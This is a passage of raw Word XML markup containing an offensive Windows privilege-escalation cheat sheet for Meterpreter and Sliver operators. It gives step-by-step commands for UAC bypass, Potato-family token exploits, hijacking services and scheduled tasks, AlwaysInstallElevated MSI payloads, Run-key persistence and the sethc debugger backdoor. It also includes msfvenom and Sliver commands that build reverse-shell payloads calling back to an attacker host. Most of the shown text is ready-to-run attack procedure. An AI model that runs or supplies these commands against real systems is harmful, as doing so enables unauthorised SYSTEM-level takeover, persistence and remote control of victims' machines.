        <w:t xml:space="preserve">    Method 2: Execute SharpBypassUAC (C# assembly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFE609B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">        upload SharpBypassUAC.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCCF3A0" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">        execute-assembly SharpBypassUAC.exe -m fodhelper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AB0862" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="206D677A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    Method 3: Manual UAC bypass via PowerShell (if dotnet is blocked)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20277EED" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">        powershell -c "Start-Process 'cmd.exe' -Verb RunAs -ArgumentList '/c calc.exe'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263D0824" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="0E6E0FD8" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>After successful bypass, you should get a new high-integrity session. Then run elevate/getsystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F627EE0" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="70AA340F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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C9C17BD" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="1B4783E8" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>4.3 – SEIMPERSONATE / SEASSIGNPRIMARYTOKEN (POTATO FAMILY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219C1162" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>─────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B53959E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>This works when you have these privileges (common for IIS, MSSQL, network service accounts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509FD75E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>Technique: Exploit the naming pipe impersonation mechanism to get SYSTEM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F160C7D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="2BE9DAFF" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>A) RottenPotato (classic – Windows 7/8/Server 2012)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45833C55" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    Meterpreter: use exploit/windows/local/rottenpotato</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AE5E99" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    Sliver: (use third-party EXE or BOF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6FE5A0" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="31C9275B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>B) JuicyPotato (Windows 7/8/10 up to 1809)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF7AE0C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    Meterpreter: use exploit/windows/local/juicy_potato</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DCA9A0" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">        set CLSID {random_GUID}  (you need to pick a suitable one)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7064197E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">        set COMMAND cmd.exe /c "your_command"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B32E3B8" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    Sliver: upload juicyPotato.exe; execute -o juicyPotato.exe -a "-t * -p cmd.exe -a '/c your_command'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A56E7BA" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="7304BB42" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>C) EfsPotato (Windows 10 1809+ / Server 2019+ – Modern)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1790DA60" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    Meterpreter: getsystem – it now includes EfsPotato automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B16510B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    Sliver: elevate -m efs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122FE75E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="52CBC8DB" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>D) SweetPotato (All Windows versions – generic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE54CE0" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    (Universal EXE) – upload and run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC32CFA" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    Meterpreter: execute -f SweetPotato.exe -a "-p whoami"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A1598B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    Sliver: execute -o SweetPotato.exe -a "-p whoami"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF52AE7" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="4B7B87B4" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>E) SigmaPotato (Latest Windows 11)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D11EF89" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    (Experimental) – similar to SweetPotato but tweaked for Defender’s new hooks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141F513C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="107C24F2" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>Troubleshooting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A20998" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>- If the potato fails, try different CLSID values (check GitHub for valid ones).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3456D01B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>- Ensure the target service (e.g., BITS, wuauserv) is running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017A6505" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="4F820FB0" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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BA0A67C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="6D1FB64A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>4.4 – SERVICE EXPLOITATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A12D84" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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65C0BB9" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="743AB243" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>A) Unquoted Service Path (as described in Part 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD5B06D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>───────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DDF148" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>If path: C:\Program Files\Vuln App\sub\service.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577E2D06" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>Vulnerable to: C:\Program.exe or C:\Program Files\Vuln.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E921F2A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="66C25BE2" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494BCDD5" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    generate payload (msfvenom) and upload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C245152" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=X LPORT=Y -f exe -o Program.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1850BB0A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    upload Program.exe C:\Program.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C243909" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell sc stop VulnService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ACF645" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell sc start VulnService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A709367" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="0BD3A432" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514EDA78" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    generate --tcp --lhost X --lport Y --format exe -o Program.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5920124C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    upload Program.exe C:\Program.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6ACC3F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell sc stop VulnService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222A502D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell sc start VulnService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C52862B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="14F205D4" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>If you don't have start/stop rights, force a reboot: shell shutdown /r /t 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D64034" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="6D69C87B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>B) Writable Service Binary (File Permission Abuse)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3CFC5D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>───────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AA41FE" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>If the actual .exe is writable by you, replace it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B28EAF" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    upload payload.exe "C:\Program Files\Vuln\service.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37188825" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    (then restart as above)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432BD29A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="033B2BA6" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>C) Service Permission Abuse (SERVICE_ALL_ACCESS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100640A5" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>─────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEABC67" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>If you have full control over a service (via SC or AccessChk):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4AB0AD" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    sc config VulnService binPath= "C:\payload.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E68E751" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    sc start VulnService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397EDBAD" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="52BE601A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>D) Creating a New Service (if you have SeImpersonate but no vulnerabilities)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C79A0A1" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>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11442DE" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>If you can create a service (requires admin usually, but sometimes misconfig):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5155F439" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    sc create NewSvc binPath= "cmd.exe /c C:\payload.exe" start= auto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698703AC" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    sc start NewSvc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA4DCEF" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="7EBCBBE6" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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9816928" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="64ABEE15" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>4.5 – SCHEDULED TASKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D99191" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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5FB23DC4" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>If a task runs as SYSTEM and points to a writable script/EXE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F87D17" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="7EE3C2FA" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BBF90B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    upload payload.exe "C:\path\to\task.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004DD705" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell schtasks /run /tn "TaskName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453E7AE3" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="08FD3D6A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7629C4C0" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    upload payload.exe "C:\path\to\task.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6DF143" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell schtasks /run /tn "TaskName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CD6665" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="79DDD601" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>If you can't run it manually, note the schedule and wait, or modify the trigger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E67CFBC" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell schtasks /change /tn "TaskName" /ru SYSTEM /rp "" /sc once /st 00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F99445F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="35E0F1FD" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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1B04BF5" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="335EAFB3" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>4.6 – ALWAYSINSTALLELEVATED (MSI Exploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52873A9F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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8E0C260" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>If Part 3.1 shows both registry keys set to 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518DA3D5" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="41D2FCBE" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5636E11C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=X LPORT=Y -f msi -o evil.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1266D215" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    upload evil.msi C:\Users\Public\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D961A1E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell msiexec /quiet /i C:\Users\Public\evil.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5274A400" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="5FC46931" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D046ACD" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    generate --tcp --lhost X --lport Y --format msi -o evil.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D81E075" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    upload evil.msi C:\Users\Public\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8CEC39" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    execute -o msiexec -a "/quiet /i C:\Users\Public\evil.msi"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4F535A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="7D3D54EB" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>NOTE: MSI runs as SYSTEM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EFC889" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="6DED11B3" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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ACCE961" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="6221F08C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>4.7 – REGISTRY EXPLOITATION (Autoruns / Image File Execution Options)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B16218C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>───────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B11C6E9" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="6408A452" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>A) Startup Folder / Run Keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A94C929" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F60EE5" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>If you can write to HKLM\Software\Microsoft\Windows\CurrentVersion\Run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A661B4" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Malicious /t REG_SZ /d "C:\payload.exe" /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FEE945" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    (Wait for system reboot or user logon)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3547BC5B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="1C11C30E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>B) Image File Execution Options (IFEO) – Debugger Hijack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7074BB50" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>─────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4942D3FD" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>If you can modify HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CB685B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6F1D8F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>Then press Shift 5 times on the login screen – spawns SYSTEM cmd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACDE120" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
